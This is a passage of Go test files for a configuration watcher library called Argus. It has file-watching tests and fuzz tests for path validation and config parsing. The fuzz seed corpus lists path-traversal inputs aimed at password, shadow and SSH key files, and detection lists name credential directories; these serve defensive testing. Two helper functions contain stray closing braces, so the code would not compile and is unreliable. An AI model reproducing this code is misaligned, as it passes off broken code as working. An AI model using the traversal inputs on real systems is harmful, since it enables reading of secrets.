	if clearedStats.Entries != 0 {
		t.Errorf("Cache should be empty after ClearCache(), got %d entries", clearedStats.Entries)
	}
}

// Test file creation and deletion detection
func TestWatcher_FileCreationAndDeletion(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping creation/deletion test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create initial test file
	testFile := helper.createTestFile("lifecycle_test.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Set up change tracking
	changesChan := make(chan ChangeEvent, 10)

	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Delete file
	helper.deleteTestFile(testFile)

	// Wait for deletion detection
	changes := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify deletion event
	if len(changes) != 1 {
		t.Fatalf("Expected 1 deletion event, got %d", len(changes))
	}

	change := changes[0]
	if change.Path != testFile {
		t.Errorf("Expected deletion path %s, got %s", testFile, change.Path)
	}
	if !change.IsDelete {
		t.Error("File deletion should be marked as deletion")
	}

	// Recreate file
	helper.createTestFile(filepath.Base(testFile), updatedTestContent)

	// Wait for recreation detection
	recreationChanges := helper.waitForChanges(changesChan, 1, testTimeout)

	// Verify recreation event
	if len(recreationChanges) != 1 {
		t.Fatalf("Expected 1 recreation event, got %d", len(recreationChanges))
	}

	recreationChange := recreationChanges[0]
	if recreationChange.IsDelete {
		t.Error("File recreation should not be marked as deletion")
	}
}

// Test multiple files watching
func TestWatcher_MultipleFiles(t *testing.T) {
	if testing.Short() {
		t.Skip("Skipping multiple files test in short mode")
	}

	helper := newTestHelper(t)
	defer helper.Close()

	// Create multiple test files
	file1 := helper.createTestFile("config1.json", initialTestContent)
	file2 := helper.createTestFile("config2.json", initialTestContent)
	file3 := helper.createTestFile("config3.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Track changes per file
	changes := make(map[string][]ChangeEvent)
	var changesMutex sync.Mutex

	// Watch all files
	for _, file := range []string{file1, file2, file3} {
		err := watcher.Watch(file, func(event ChangeEvent) {
			changesMutex.Lock()
			changes[event.Path] = append(changes[event.Path], event)
			changesMutex.Unlock()
		})
		if err != nil {
			t.Fatalf("Failed to watch file %s: %v", file, err)
		}
	}

	// Verify all files are being watched
	if watcher.WatchedFiles() != 3 {
		t.Errorf("Expected 3 watched files, got %d", watcher.WatchedFiles())
	}

	// Start watcher
	if err := watcher.Start(); err != nil {
		t.Fatalf("Failed to start watcher: %v", err)
	}

	// Wait for initial stabilization
	time.Sleep(testWaitTime)

	// Modify files sequentially with delays to ensure distinct events
	helper.updateTestFile(file1, updatedTestContent)
	time.Sleep(testWaitTime / 2)

	helper.updateTestFile(file2, updatedTestContent)
	time.Sleep(testWaitTime / 2)

	helper.updateTestFile(file3, updatedTestContent)

	// Wait for all changes to be detected
	time.Sleep(testTimeout)

	// Verify changes for each file
	changesMutex.Lock()
	defer changesMutex.Unlock()

	for _, file := range []string{file1, file2, file3} {
		fileChanges, exists := changes[file]
		if !exists || len(fileChanges) == 0 {
			t.Errorf("No changes detected for file %s", file)
		} else {
			t.Logf("File %s: detected %d changes", file, len(fileChanges))
		}
	}
}

// Test unwatch functionality
func TestWatcher_Unwatch(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

	// Create test file
	testFile := helper.createTestFile("unwatch_test.json", initialTestContent)

	// Create watcher
	watcher := helper.createWatcher()

	// Watch file
	changesChan := make(chan ChangeEvent, 10)
	err := watcher.Watch(testFile, func(event ChangeEvent) {
		changesChan <- event
	})
	if err != nil {
		t.Fatalf("Failed to watch file: %v", err)
	}

	// Verify file is being watched
	if watcher.WatchedFiles() != 1 {
		t.Errorf("Expected 1 watched file, got %d", watcher.WatchedFiles())
	}

	// Unwatch file
	err = watcher.Unwatch(testFile)
	if err != nil {
		t.Fatalf("Failed to unwatch file: %v", err)
	}

	// Verify file is no longer being watched
	if watcher.WatchedFiles() != 0 {
		t.Errorf("Expected 0 watched files after unwatch, got %d", watcher.WatchedFiles())
	}

	// Test unwatching non-existent file (should not error)
	err = watcher.Unwatch("/non/existent/file.json")
	if err != nil {
		t.Errorf("Unwatching non-existent file should not error, got: %v", err)
	}
}

// Test error conditions and edge cases
func TestWatcher_ErrorConditions(t *testing.T) {
	t.Parallel()

	helper := newTestHelper(t)
	defer helper.Close()

	watcher := helper.createWatcher()

	t.Run("watch_non_existent_file", func(t *testing.T) {
		// Watching non-existent file should NOT error (Argus watches paths, not just existing files)
		err := watcher.Watch("/non/existent/file.json", func(event ChangeEvent) {})
		if err != nil {
			t.Errorf("Watching non-existent file should not return error, got: %v", err)
		}
	})

	t.Run("watch_with_nil_callback", func(t *testing.T) {
		err := watcher.Watch("/some/path.json", nil)
		if err == nil {
			t.Error("Watching with nil callback should return error")
		}
	})

	t.Run("double_start", func(t *testing.T) {
		if err := watcher.Start(); err != nil {
			t.Fatalf("First start failed: %v", err)
		}

		// Second start should return error (not idempotent)
		if err := watcher.Start(); err == nil {
			t.Error("Second start should return error")
		}

		if err := watcher.Stop(); err != nil {
			t.Logf("Failed to stop watcher: %v", err)
		}
	})

	t.Run("stop_without_start", func(t *testing.T) {
		freshWatcher := helper.createWatcher()

		// Stopping without starting should return error
		if err := freshWatcher.Stop(); err == nil {
			t.Error("Stop without start should return error")
		}
	})
}

// Test OS-specific behavior
func TestWatcher_OSSpecificBehavior(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

	t.Run("path_handling", func(t *testing.T) {
		watcher := helper.createWatcher()

		// Test with OS-specific path separators
		var testPath string
		if runtime.GOOS == "windows" {
			testPath = filepath.Join(helper.tempDir, "test\\config.json")
		} else {
			testPath = filepath.Join(helper.tempDir, "test/config.json")
		}

		// Create directory if needed
		dir := filepath.Dir(testPath)
		if err := os.MkdirAll(dir, 0755); err != nil {
			t.Fatalf("Failed to create directory: %v", err)
		}

		// Create file
		if err := os.WriteFile(testPath, []byte(initialTestContent), 0644); err != nil {
			t.Fatalf("Failed to create test file: %v", err)
		}

		// Should be able to watch regardless of path format
		err := watcher.Watch(testPath, func(event ChangeEvent) {})
		if err != nil {
			t.Errorf("Should be able to watch OS-specific path %s: %v", testPath, err)
		}
	})
}

func TestWatcher_Close(t *testing.T) {
	helper := newTestHelper(t)
	defer helper.Close()

	t.Run("close_alias_for_stop", func(t *testing.T) {
		watcher := helper.createWatcher()

		// Start watcher
		if err := watcher.Start(); err != nil {
			t.Fatalf("Failed to start watcher: %v", err)
		}

		// Close should work like Stop
		if err := watcher.Close(); err != nil {
			t.Errorf("Close() failed: %v", err)
		}

		// Should be stopped now
		if watcher.IsRunning() {
			t.Error("Watcher should be stopped after Close()")
		}
	})
}

```

## /argus_edge_test.go

```go path="/argus_edge_test.go" 
// argus_edge_test.go - Edge test cases for Argus
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"strings"
	"testing"
	"time"
)

// TestUnwatchErrorCases tests error cases in Unwatch function
func TestUnwatchErrorCases(t *testing.T) {
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
	})

	// Unwatching a non-existent file should be a no-op; log any error for visibility
	err := watcher.Unwatch("/non/existent/file.json")
	if err != nil {
		t.Logf("Unwatching non-existent file returned: %v", err)
	}

	// Test unwatching after stopping
	if err := watcher.Stop(); err != nil {
		// Only error if it's not "watcher is not running"
		if !strings.Contains(err.Error(), "watcher is not running") {
			t.Errorf("Failed to stop watcher: %v", err)
		}
	}
	err = watcher.Unwatch("/any/file.json")
	if err != nil {
		t.Logf("Unwatching after stop returned: %v", err)
	}
}

// TestRemoveFromCacheEdgeCases tests edge cases in removeFromCache
func TestRemoveFromCacheEdgeCases(t *testing.T) {
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     1 * time.Second,
	})

	// Add multiple entries to cache
	tmpDir := t.TempDir()
	testFiles := []string{
		filepath.Join(tmpDir, "test1.json"),
		filepath.Join(tmpDir, "test2.json"),
		filepath.Join(tmpDir, "test3.json"),
	}

	// Create files and add to cache
	for _, file := range testFiles {
		if err := os.WriteFile(file, []byte(`{"test": true}`), 0644); err != nil {
			t.Fatalf("Failed to create test file %s: %v", file, err)
		}
		_, err := watcher.getStat(file)
		if err != nil {
			t.Fatalf("Failed to get stat for %s: %v", file, err)
		}
	}

	// Remove files from cache one by one
	for _, file := range testFiles {
		watcher.removeFromCache(file)
	}

	// Verify cache is clean
	stats := watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries after removal, got %d", stats.Entries)
	}
}

// TestParseConfigErrorHandling tests error cases in ParseConfig
func TestParseConfigErrorHandling(t *testing.T) {
	// Test invalid JSON
	_, err := ParseConfig([]byte(`{invalid json`), FormatJSON)
	if err == nil {
		t.Errorf("Expected error for invalid JSON")
	}

	// Test invalid YAML - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte("invalid: yaml: content: ["), FormatYAML)
	if err != nil {
		t.Logf("YAML parser correctly detected error: %v", err)
	}

	// Test invalid TOML - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte(`[invalid toml content`), FormatTOML)
	if err != nil {
		t.Logf("TOML parser correctly detected error: %v", err)
	}

	// Test invalid HCL - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte(`invalid { hcl content`), FormatHCL)
	if err != nil {
		t.Logf("HCL parser correctly detected error: %v", err)
	}

	// Test unknown format
	_, err = ParseConfig([]byte(`content`), FormatUnknown)
	if err == nil {
		t.Errorf("Expected error for unknown format")
	}
}

// TestFlushBufferUnsafeEdgeCases tests edge cases in flushBufferUnsafe
func TestFlushBufferUnsafeEdgeCases(t *testing.T) {
	config := DefaultAuditConfig()
	config.BufferSize = 2 // Very small buffer
	config.Enabled = true

	tmpDir := t.TempDir()
	config.OutputFile = filepath.Join(tmpDir, "audit.log")

	logger, err := NewAuditLogger(config)
	if err != nil {
		t.Fatalf("Failed to create audit logger: %v", err)
	}
	defer func() {
		if err := logger.Close(); err != nil {
			t.Errorf("Failed to close logger: %v", err)
		}
	}()
	// Fill buffer to trigger flush
	logger.Log(AuditInfo, "Test message 1", "argus", "/test1.json", nil, nil, map[string]interface{}{"key": "value1"})
	logger.Log(AuditInfo, "Test message 2", "argus", "/test2.json", nil, nil, map[string]interface{}{"key": "value2"})
	logger.Log(AuditInfo, "Test message 3", "argus", "/test3.json", nil, nil, map[string]interface{}{"key": "value3"})

	// Force flush to test flush buffer unsafe
	if err := logger.Flush(); err != nil {
		t.Errorf("Failed to flush logger: %v", err)
	}

	// Verify audit file exists (accounting for SQLite backend auto-selection)
	if _, err := os.Stat(config.OutputFile); os.IsNotExist(err) {
		// Check if there's a SQLite file instead (backend auto-selection logic)
		sqliteFile := strings.Replace(config.OutputFile, ".log", ".db", 1)
		if _, err := os.Stat(sqliteFile); os.IsNotExist(err) {
			t.Logf("Neither JSONL nor SQLite audit file found - backend may have auto-selected a different format")
			// This is acceptable with the new backend system
		}
	}
}

```

## /argus_fuzz_test.go

```go path="/argus_fuzz_test.go" 
// argus_fuzz_test.go - Comprehensive fuzz testing for Argus security-critical functions
//
// This file contains fuzz tests designed to find security vulnerabilities, edge cases,
// and unexpected behaviors in Argus input processing functions.
//
// Focus areas:
// - Path validation and sanitization (ValidateSecurePath)
// - Configuration parsing (ParseConfig)
// - Input validation and processing
//
// The fuzz tests use property-based testing to verify security invariants:
// - ValidateSecurePath should NEVER allow dangerous paths to pass
// - Parsers should handle malformed input gracefully without panics
// - All input validation should be consistent and robust
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"strings"
	"testing"
	"unicode"
)

// FuzzValidateSecurePath performs comprehensive fuzz testing on the ValidateSecurePath function.
//
// SECURITY PURPOSE: This fuzz test is critical for preventing directory traversal attacks.
// ValidateSecurePath is the primary defense against path-based security vulnerabilities,
// so thorough fuzzing is essential to find edge cases that could be exploited.
//
// TESTING STRATEGY:
// 1. Property-based testing: Verify security invariants hold for all inputs
// 2. Mutation-based: Start with known attack vectors and mutate them
// 3. Edge case generation: Test boundary conditions and unusual encodings
// 4. Cross-platform: Ensure consistent security across different OS path conventions
//
// SECURITY INVARIANTS TESTED:
// - No path containing ".." should ever be accepted as safe
// - No path accessing system directories should be accepted
// - No URL-encoded attack vectors should bypass validation
// - No Windows device names should be accepted
// - No control characters or null bytes should be accepted
// - Path length limits should be enforced consistently
//
// The fuzzer will help discover:
// - Unicode normalization attacks
// - Novel encoding bypass techniques
// - OS-specific path handling edge cases
// - Buffer overflow conditions with extremely long paths
// - Race conditions in validation logic
func FuzzValidateSecurePath(f *testing.F) {
	// SEED CORPUS: Based on real attack vectors and edge cases from existing tests
	// This provides the fuzzer with a good starting point for mutations

	// Basic valid paths that should always pass
	f.Add("config.json")
	f.Add("app/config.yaml")
	f.Add("/etc/argus/config.toml")
	f.Add("C:\\Program Files\\MyApp\\config.ini")
	f.Add(".gitignore") // Valid dot files
	f.Add("configs/database/prod.json")

	// Path traversal attack vectors - these should ALWAYS fail
	f.Add("../../../etc/passwd")
	f.Add("..\\..\\..\\windows\\system32\\config\\sam")
	f.Add("../../../../root/.ssh/id_rsa")
	f.Add("/var/www/../../../etc/shadow")
	f.Add("config/../../../proc/self/environ")
	f.Add("./../../etc/hosts")

	// URL-encoded attacks - should be detected and blocked
	f.Add("%2e%2e/%2e%2e/etc/passwd")
	f.Add("%252e%252e/etc/passwd") // Double encoded
	f.Add("..%2fetc%2fpasswd")     // Mixed encoding
	f.Add("%2e%2e\\%2e%2e\\windows\\system32")
	f.Add("config%00.txt") // Null byte injection

	// Windows-specific attack vectors
	f.Add("CON") // Device name
	f.Add("PRN.txt")
	f.Add("COM1.log")
	f.Add("LPT1.dat")
	f.Add("AUX.conf")
	f.Add("NUL.json")
	f.Add("file.txt:hidden") // Alternate Data Streams
	f.Add("config.json:$DATA")

	// System file access attempts
	f.Add("/etc/passwd")
	f.Add("/etc/shadow")
	f.Add("/proc/self/mem")
	f.Add("/sys/kernel/debug")
	f.Add("C:\\Windows\\System32\\config\\SAM")
	f.Add("C:\\WINDOWS\\SYSTEM32\\CONFIG\\SECURITY") // Case variations
	f.Add("/ETC/PASSWD")                             // Case variations for case-insensitive filesystems

	// Edge cases with special characters
	f.Add("config with spaces.json")
	f.Add("config-with-dashes.json")
	f.Add("config_with_underscores.json")
	f.Add("config.with.dots.json")
	f.Add("config@domain.json")
	f.Add("config#hash.json")
	f.Add("config$dollar.json")
	f.Add("config&amp.json")

	// Very long paths to test buffer limits
	f.Add(strings.Repeat("a", 100) + "/config.json")
	f.Add(strings.Repeat("dir/", 20) + "config.json")
	f.Add(strings.Repeat("../", 50) + "etc/passwd")

	// Unicode and encoding edge cases
	f.Add("café/config.json")  // Non-ASCII characters
	f.Add("конфиг.json")       // Cyrillic
	f.Add("設定.json")           // Chinese characters
	f.Add("config\u00A0.json") // Non-breaking space
	f.Add("config\u200B.json") // Zero-width space

	// Control characters and suspicious bytes
	f.Add("config\x00.json") // Null byte
	f.Add("config\x01.json") // SOH control char
	f.Add("config\x1F.json") // US control char
	f.Add("config\x7F.json") // DEL character
	f.Add("config\xFF.json") // High byte

	// Path normalization attack attempts
	f.Add("config/./../../etc/passwd")
	f.Add("config//..//../../etc/passwd")
	f.Add("config\\.\\.\\..\\..\\etc\\passwd")
	f.Add("config/.././../../etc/passwd")

	// Mixed separators and complex traversals
	f.Add("config\\../../../etc/passwd") // Mixed separators
	f.Add("config/..\\../etc/passwd")
	f.Add("config\\..\\../etc/passwd")
	f.Add("config/../..\\etc/passwd")

	// Execute the fuzz test with property-based validation
	f.Fuzz(func(t *testing.T, path string) {
		// Skip empty strings as they have a specific error case
		if path == "" {
			return
		}

		// Call the function under test
		err := ValidateSecurePath(path)

		// SECURITY INVARIANT 1: Paths with obvious traversal patterns should NEVER pass
		if containsDangerousTraversal(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path with dangerous traversal was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 2: System file access should be blocked
		if containsSystemFileAccess(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: System file access was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 3: Windows device names should be blocked
		if containsWindowsDeviceName(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Windows device name was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 4: Control characters should be blocked
		if containsControlCharacters(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path with control characters was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 5: Excessively long paths should be blocked
		if len(path) > 4096 {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Excessively long path was accepted (len=%d): %q", len(path), truncateString(path, 50))
			}
		}

		// SECURITY INVARIANT 6: Complex nested paths should be blocked
		separatorCount := strings.Count(path, "/") + strings.Count(path, "\\")
		if separatorCount > 50 {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Overly complex path was accepted (separators=%d): %q", separatorCount, truncateString(path, 50))
			}
		}

		// SECURITY INVARIANT 7: URL-encoded dangerous patterns should be blocked
		if containsURLEncodedAttack(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: URL-encoded attack vector was accepted: %q", path)
			}
		}

		// BEHAVIORAL INVARIANT: Function should never panic
		// (This is implicitly tested by the fuzzer - if it panics, the test fails)

		// BEHAVIORAL INVARIANT: Error messages should not leak sensitive information
		if err != nil && containsSensitiveInfo(err.Error()) {
			t.Errorf("INFORMATION LEAK: Error message contains sensitive information: %v", err)
		}

		// PERFORMANCE INVARIANT: Function should complete in reasonable time
		// (Implicitly tested by fuzzer timeout mechanisms)
	})
}

// containsDangerousTraversal checks if a path contains obvious directory traversal patterns
func containsDangerousTraversal(path string) bool {
	lowerPath := strings.ToLower(path)

	dangerousPatterns := []string{
		"..",
		"../",
		"..\\",
		"/..",
		"\\..",
		"/../",
		"\\..\\",
	}

	for _, pattern := range dangerousPatterns {
		if strings.Contains(lowerPath, pattern) {
			return true
		}
	}
	return false
}

// containsSystemFileAccess checks if a path attempts to access system files
func containsSystemFileAccess(path string) bool {
	lowerPath := strings.ToLower(path)

	systemPaths := []string{
		"/etc/passwd",
		"/etc/shadow",
		"/etc/hosts",
		"/proc/",
		"/sys/",
		"/dev/",
		"windows/system32",
		"windows\\system32",
		"program files",
		".ssh/",
		".aws/",
	}

	for _, sysPath := range systemPaths {
		if strings.Contains(lowerPath, sysPath) {
			return true
		}
	}
	return false
}

// containsWindowsDeviceName mirrors the EXACT logic from ValidateSecurePath
// to ensure fuzzer consistency. This function should return true ONLY when
// ValidateSecurePath would actually reject the path for device name reasons.
func containsWindowsDeviceName(path string) bool {
	windowsDevices := []string{
		"CON", "PRN", "AUX", "NUL",
		"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
		"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
	}

	// First handle non-UNC paths (direct device name access)
	if !(strings.HasPrefix(path, "/") || strings.HasPrefix(path, "\\")) || len(path) <= 1 {
		baseName := getBaseName(path)
		baseUpper := strings.ToUpper(baseName)

		// Remove ALL extensions if present (handle multiple extensions)
		for {
			if dotIndex := strings.Index(baseUpper, "."); dotIndex != -1 {
				baseUpper = baseUpper[:dotIndex]
			} else {
				break
			}
		}

		for _, device := range windowsDevices {
			if baseUpper == device {
				return true
			}
		}
		return false
	}

	// UNC path logic - MIRROR ValidateSecurePath EXACTLY
	// Normalize the path: remove all leading slashes and backslashes
	normalizedPath := path
	for len(normalizedPath) > 0 && (normalizedPath[0] == '/' || normalizedPath[0] == '\\') {
		normalizedPath = normalizedPath[1:]
	}

	if len(normalizedPath) == 0 {
		return false
	}

	// Split by both types of separators to get path components
	normalizedForSplit := strings.ReplaceAll(normalizedPath, "\\", "/")
	components := strings.Split(normalizedForSplit, "/")

	if len(components) == 0 || components[0] == "" {
		return false
	}

	// Check if the first component is a device name
	firstComponent := strings.ToUpper(components[0])
	// Remove ALL extensions if present (handle multiple extensions)
	for {
		if dotIndex := strings.Index(firstComponent, "."); dotIndex != -1 {
			firstComponent = firstComponent[:dotIndex]
		} else {
			break
		}
	}

	// Always block if first component is a device name
	for _, device := range windowsDevices {
		if firstComponent == device {
			return true
		}
	}

	// Check second component only if specific conditions are met
	if len(components) >= 2 {
		secondComponent := strings.ToUpper(components[1])
		// Remove ALL extensions if present (handle multiple extensions)
		for {
			if dotIndex := strings.Index(secondComponent, "."); dotIndex != -1 {
				secondComponent = secondComponent[:dotIndex]
			} else {
				break
			}
		}

		// If second component is device AND first component looks suspicious (≤2 chars), block it
		for _, device := range windowsDevices {
			if secondComponent == device && len(components[0]) <= 2 {
				return true
			}
		}
	}

	return false
}

// containsControlCharacters checks if a path contains dangerous control characters
func containsControlCharacters(path string) bool {
	for _, char := range path {
		// Allow tab, LF, CR but block other control characters
		if char < 32 && char != 9 && char != 10 && char != 13 {
			return true
		}
		// Null byte (already covered by the check above; kept explicit for clarity)
		if char == 0 {
			return true
		}
	}
	}
	return false
}

// containsURLEncodedAttack checks for URL-encoded attack patterns
func containsURLEncodedAttack(path string) bool {
	lowerPath := strings.ToLower(path)

	encodedPatterns := []string{
		"%2e%2e",     // ".." encoded
		"%252e%252e", // ".." double encoded
		"%2f",        // "/" encoded (in dangerous contexts)
		"%252f",      // "/" double encoded
		"%5c",        // "\" encoded
		"%255c",      // "\" double encoded
		"%00",        // null byte
		"%2500",      // null byte double encoded
	}

	for _, pattern := range encodedPatterns {
		if strings.Contains(lowerPath, pattern) {
			return true
		}
	}
	return false
}

// containsSensitiveInfo checks if an error message leaks sensitive information
func containsSensitiveInfo(errorMsg string) bool {
	lowerMsg := strings.ToLower(errorMsg)

	// Check for potentially sensitive information in error messages
	sensitivePatterns := []string{
		"password",
		"secret",
		"key",
		"token",
		"credential",
		"private",
		"/home/",
		"c:\\users\\",
	}

	for _, pattern := range sensitivePatterns {
		if strings.Contains(lowerMsg, pattern) {
			return true
		}
	}
	return false
}

// Helper functions

func getBaseName(path string) string {
	// Simple basename extraction - find last separator
	lastSlash := strings.LastIndex(path, "/")
	lastBackslash := strings.LastIndex(path, "\\")

	separator := lastSlash
	if lastBackslash > separator {
		separator = lastBackslash
	}

	if separator == -1 {
		return path
	}
	return path[separator+1:]
}

func truncateString(s string, maxLen int) string {
	if len(s) <= maxLen {
		return s
	}
	return s[:maxLen] + "..."
}
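
// truncateString slices by byte offset, which can split a multi-byte UTF-8
// character at the cut point. A rune-safe sketch (illustrative only) converts
// to []rune first, at the cost of an extra allocation:
func truncateRunes(s string, maxLen int) string {
	r := []rune(s)
	if len(r) <= maxLen {
		return s
	}
	return string(r[:maxLen]) + "..."
}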

// FuzzParseConfig performs fuzz testing on the configuration parsing functionality.
//
// This secondary fuzz test targets the ParseConfig function which is another critical
// attack surface. Malformed configuration data could potentially cause:
// - Buffer overflows or memory corruption
// - Denial of service through resource exhaustion
// - Logic errors leading to security bypasses
// - Parser confusion attacks
//
// The fuzzer tests all supported configuration formats to ensure robust parsing.
func FuzzParseConfig(f *testing.F) {
	// Seed corpus with valid configurations in different formats
	f.Add([]byte(`{"key": "value", "number": 42}`), int(FormatJSON))
	f.Add([]byte("key: value\nnumber: 42"), int(FormatYAML))
	f.Add([]byte("key = \"value\"\nnumber = 42"), int(FormatTOML))
	f.Add([]byte("key=value\nnumber=42"), int(FormatINI))
	f.Add([]byte("key=value\nnumber=42"), int(FormatProperties))

	// Malformed inputs that should be handled gracefully
	f.Add([]byte(`{"invalid": json}`), int(FormatJSON))
	f.Add([]byte("invalid: yaml: content:"), int(FormatYAML))
	f.Add([]byte("invalid = toml = format"), int(FormatTOML))
	f.Add([]byte(""), int(FormatJSON)) // Empty input

	f.Fuzz(func(t *testing.T, data []byte, formatInt int) {
		// Convert int back to ConfigFormat, handle invalid values
		if formatInt < 0 || formatInt >= int(FormatUnknown) {
			return // Skip invalid format values
		}
		format := ConfigFormat(formatInt)

		// The function should never panic, regardless of input
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("ParseConfig panicked with input format=%v, data length=%d: %v", format, len(data), r)
			}
		}()

		// Call function under test
		result, err := ParseConfig(data, format)

		// If parsing succeeds, result should be valid
		if err == nil {
			if result == nil {
				t.Errorf("ParseConfig returned nil result without error")
			}
			// Verify the result is a valid map
			for k := range result {
				if !isValidConfigKeyForFormat(k, format) {
					t.Errorf("ParseConfig produced invalid key: %q", k)
				}
			}
		}

		// Error messages should not contain raw input data to prevent info leaks
		if err != nil && len(data) > 0 && containsRawData(err.Error(), data) {
			t.Errorf("Error message contains raw input data, potential information leak")
		}
	})
}

// isValidConfigKeyForFormat checks if a configuration key is valid for a specific format
func isValidConfigKeyForFormat(key string, format ConfigFormat) bool {
	// Check for null bytes - never allowed in any format
	if strings.Contains(key, "\x00") {
		return false
	}

	// Format-specific validations
	switch format {
	case FormatJSON:
		// JSON allows empty keys and escaped control characters per RFC 7159.
		// For security we are stricter about control characters (checked
		// below), but the empty key remains valid.
		if key == "" {
			return true // Empty keys allowed in JSON
		}
		}
		// Check for dangerous control characters in JSON too
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false // Security policy: no non-printable chars in config keys
			}
		}
		return true
	case FormatYAML, FormatTOML, FormatINI, FormatProperties, FormatHCL:
		// These formats don't allow empty keys
		if key == "" {
			return false
		}
		// Check for dangerous control characters
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false
			}
		}
		return true
	default:
		// For unknown formats, be conservative
		if key == "" {
			return false
		}
		// Check for dangerous control characters
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false
			}
		}
		return true
	}
}

// containsRawData checks if error message contains portions of raw input data
func containsRawData(errorMsg string, data []byte) bool {
	dataStr := string(data)

	// Skip very short inputs (less than 8 chars) to avoid false positives with common words
	if len(dataStr) < 8 {
		return false
	}

	// For short inputs (8-15 chars), only flag if the entire input appears in error
	if len(dataStr) < 16 {
		return strings.Contains(errorMsg, dataStr)
	}

	// For longer inputs, check if significant chunks appear in error message
	if len(dataStr) > 50 {
		dataStr = dataStr[:50] // Check first 50 chars
	}

	return strings.Contains(errorMsg, dataStr)
}

// TestFuzzBypassAnalysis manually tests the bypass found by fuzzer
func TestFuzzBypassAnalysis(t *testing.T) {
	// Test the bypass found by fuzzer
	testPaths := []string{
		"//Con",
		"Con",
		"CON",
		"con",
		"//CON",
		"\\\\Con",
		"/Con",
		"//con",
		"/\\000/Con",   // Previous test case
		"PRN.0.",       // New fuzzer finding
		"COM1.txt.bak", // Multiple extensions
		"AUX.a.b.c",    // Many extensions
		"NUL...",       // Multiple dots
		"LPT1.exe.old", // Executable with backup extension
	}

	for _, path := range testPaths {
		err := ValidateSecurePath(path)
		t.Logf("Path: %-15s -> Error: %v", path, err)

		// Also test what our fuzzer functions think
		isDeviceName := containsWindowsDeviceName(path)
		t.Logf("  containsWindowsDeviceName(%q) = %v", path, isDeviceName)

		base := getBaseName(path) // Use our helper function
		t.Logf("  getBaseName(%q) = %q", path, base)
	}
}

// TestUNCPathDeviceNameRegression tests the specific UNC path device name vulnerability
// that was found by the fuzzer to ensure it stays fixed.
//
// SECURITY: This is a regression test for CVE-equivalent vulnerability where UNC paths
// could bypass Windows device name validation, potentially allowing access to system devices.
func TestUNCPathDeviceNameRegression(t *testing.T) {
	// Test cases for UNC path device name bypass vulnerability
	maliciousUNCPaths := []struct {
		path        string
		description string
	}{
		{"//Con", "UNC path to CON device"},
		{"\\\\Con", "Windows UNC path to CON device"},
		{"//CON", "UNC path to CON device (uppercase)"},
		{"\\\\CON", "Windows UNC path to CON device (uppercase)"},
		{"//con", "UNC path to CON device (lowercase)"},
		{"\\\\con", "Windows UNC path to CON device (lowercase)"},
		{"//PRN", "UNC path to PRN device"},
		{"\\\\PRN", "Windows UNC path to PRN device"},
		{"//AUX", "UNC path to AUX device"},
		{"\\\\AUX", "Windows UNC path to AUX device"},
		{"//NUL", "UNC path to NUL device"},
		{"\\\\NUL", "Windows UNC path to NUL device"},
		{"//COM1", "UNC path to COM1 device"},
		{"\\\\COM1", "Windows UNC path to COM1 device"},
		{"//LPT1", "UNC path to LPT1 device"},
		{"\\\\LPT1", "Windows UNC path to LPT1 device"},
		{"//Con.txt", "UNC path to CON device with extension"},
		{"\\\\Con.txt", "Windows UNC path to CON device with extension"},
		{"//Con/subfolder", "UNC path to CON device with subfolder"},
		{"\\\\Con\\subfolder", "Windows UNC path to CON device with subfolder"},
		{"///Con", "Triple slash UNC path to CON device"},
		{"////CON", "Quad slash UNC path to CON device"},
		{"\\\\\\Con", "Triple backslash UNC path to CON device"},
		{"/////con.txt", "Many slash UNC path to CON device with extension"},
		{"/\\Con", "Mixed separator UNC path to CON device"},
		{"/\\0/Con", "Mixed separator with suspicious server name"},
		{"\\//Con", "Reverse mixed separator UNC path to CON device"},
	}

	for _, testCase := range maliciousUNCPaths {
		t.Run(testCase.description, func(t *testing.T) {
			err := ValidateSecurePath(testCase.path)

			// All these paths should be rejected for security
			if err == nil {
